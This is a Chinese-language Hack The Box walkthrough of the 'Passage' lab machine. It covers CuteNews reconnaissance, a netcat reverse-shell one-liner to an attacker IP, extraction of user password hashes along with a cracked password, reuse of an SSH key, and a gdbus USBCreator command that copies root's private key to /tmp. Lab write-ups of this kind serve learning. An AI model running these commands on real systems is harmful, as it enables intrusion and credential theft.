HTB-Passage

这篇具有很好参考价值的文章主要介绍了HTB-Passage。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

HTB-Passage

信息收集

80端口

powered by CuteNews。
HTB-Passage
目标似乎拥有WAF\IDS,对其进行目录扫描有点困难。并且第一篇贴纸就说明了开启了Fail2Ban。
HTB-Passage
可以通过几篇文章收集几个用户及其邮箱。

HTB-Passage

Kim Swif		- 	kim@example.com
Admin			-	nadav@passage.com
Sid Meier		-	sid@example.com
Paul Coles		-	paul@passage.com
James			-	james@example.com

主界面有一个RSS。
HTB-Passage
点进去后url变成了/CuteNews/rss.php。

HTB-Passage
跳转到上一级出现了CuteNews的管理系统界面。

HTB-Passage
并且知道了CuteNews的具体版本是2.1.2。
HTB-Passage
简单搜索可以知道有许多可以利用的地方。

HTB-Passage
HTB-Passage

www-data

成功反弹shell。rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.31 4443 >/tmp/f
HTB-Passage
一般来说登陆界面都会和数据库挂钩,所以我们去检查有没有相关的数据库文件。但是在查看CuteNews的安装教程发现了下面这句话。
HTB-Passage
因为CuteNews是一个轻量化的CMS数据都存储在文件中,所以我们不必创建或配置数据库即可使用。于是我们的重心会稍微偏向于寻找一些数据文件。在/var/www/html/CuteNews/cdata/users目录中找到一个lines文件,lines文件内容如下。
HTB-Passage
一堆base64和access denied。将base64拿出来解码看看。

HTB-Passage
能够看到许多用户的hash都在里面。

admin:7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
sid-meier:4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
paul-coles:e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
kim-swift:f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
egre55:4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc

www-data -> paul

paul-coles的密码疑似atlanta1。
HTB-Passage

HTB-Passage

paul -> nadav

在paul的主目录下有.ssh文件,获取id_rsa后通过ssh登录(原谅我脑子抽了忘了我有paul的密码),并且发现公钥末尾居然是nadav。HTB-Passage
HTB-Passage

nadav -> root

虽然nadav拥有一些分组,但是我们没有nadav的密码。
HTB-Passage
所以现在要么看看nadav的hash有没有办法破解,要么继续收集一下信息。

HTB-Passage
去看看.viminfo里面提及到的两个文件/etc/dbus-1/system.d/com.ubuntu.USBCreator.conf和/etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf。

/etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
HTB-Passage

/etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
HTB-Passage

与 sudo 等传统的特权授权程序不同,PolKit 不会向整个会话授予 root 权限,而只向相关的操作授予该权限。

并且在.viminfo中能看到这几句。将原来的AdminIdentities=unix-group:root改为了AdminIdentities=unix-group:sudo。

# hlsearch on (H) or off (h):
~h
# Last Substitute Search Pattern:
~MSle0~&AdminIdentities=unix-group:root

# Last Substitute String:
$AdminIdentities=unix-group:sudo

# Command Line History (newest to oldest):
:wq
:%s/AdminIdentities=unix-group:root/AdminIdentities=unix-group:sudo/g

# Search String History (newest to oldest):
? AdminIdentities=unix-group:root

分别对其进行搜索。
HTB-Passage
可以以root身份用任意内容复写文件

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

HTB-Passage
使用命令将root的.ssh/id_rsa覆写到tmp里面。
HTB-Passage
然后稍加处理就可以以root登录了。

HTB-Passage文章来源地址https://www.toymoban.com/news/detail-410838.html

到了这里,关于HTB-Passage的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全-信息收集】网络安全之信息收集和信息收集工具讲解(提供工具)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 工具下载百度网盘链接(包含所有用到的工具): 百度网盘 请输入提取码 百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固,

    2024年02月08日
    浏览(53)
  • 网络安全信息收集初探之域名信息收集

    扫描单个域名 批量扫描域名 oneforall 额外参数 ![在这里插入图片描述](https://img-blog.csdnimg.cn/615763f979ea453091ad715f69980555.png https://crt.sh/ https://search.censys.io/

    2024年02月13日
    浏览(56)
  • 4.1 - 信息收集 - 子域名收集

    「作者简介」: CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者 「推荐专栏」: 对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 子域名就是下一级域

    2024年02月05日
    浏览(44)
  • 《渗透测试》-前期信息收集及工具介绍01(信息收集简介、JSFinder、OneForAll)

    信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进 行。比如目标站点IP、中间件、脚本语言、端口、邮箱等等。信息收集包含资产收集 但不限于资产收集。 1、信息收集是渗透测试成功的保障 2、更多的暴露面 3、更大的可能性 1、主动信息收

    2024年02月03日
    浏览(57)
  • 内网安全 信息收集(收集内网计算机的所有信息 进行攻击.)

    在   渗透测试人员 进入一个内 网后,面对的是一片 “ 未知的区域 ”,所以 渗透测试人员首先会对当前所 处的网络环境进行判断,通常的判断分为三种. (1) 我是谁? —— 对计算机的角色进行判断. (2)我在哪? —— 对目前机器所处位置区域的判断。 (3)这是哪?

    2024年02月02日
    浏览(49)
  • 渗透测试之信息收集篇-服务器子域名收集

    你可能对某个服务器渗透失败,没有发现入侵点,所以我们可以考虑扩大攻击面,对target.com的子域名 进行渗透,然后横向移动。 使用bbot对目标子域进行收集 https://github.com/blacklanternsecurity/bbot/wiki#installation 关于子域名收集,推荐一篇很好的文章,文章地址:https://blog.blackl

    2024年02月16日
    浏览(37)
  • 一款强大的红队信息收集和资产收集工具(Kscan)

    Kscan是一款纯go开发的全方位扫描器,具备端口扫描、协议检测、指纹识别等功能。支持协议1200+,协议指纹10000+,应用指纹2000+,暴力PJ协议10余种。 Kscan能够接受多种输入格式,无需在使用之前对扫描对象进行分类,比如区分为IP,还是URL地址等,这对于使用者来说无疑是徒

    2023年04月08日
    浏览(42)
  • IP信息收集

    CDN 简介 CDN 的全称是 Content Delivery Network,即内容分发网络。CDN 是构建在现有网络其础之上的智能拟网络,依靠部需在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所孺内容,降低网络拥塞,提高用户访问响应速度和命中率。但

    2024年02月20日
    浏览(35)
  • 信息收集 - 网站服务器

    操作系统 区分大小写: 如果修改首页或其他页面的大小写后,网站返回一个错误页面,例如报错 \\\"404 Not Found\\\" 或类似的错误,这可能意味着网站运行在 Linux 或类 Unix 操作系统上。这是因为大多数 Linux 系统是区分大小写的 。 如果修改大小写后,网站页面正常显示,这可能意

    2024年02月21日
    浏览(49)
  • 渗透测试——信息收集(详细)

    前言: 信息收集是渗透测试除了授权之外的第一步,也是关键的一步,尽量多的收集目标的信息会给后续的渗透事半功倍。收集信息的思路有很多,例如: 页面信息收集、域名信息收集、敏感信息收集、子域名收集、端口探测、CMS指纹识别、查找真实IP、敏感目录/文件收集

    2024年02月13日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包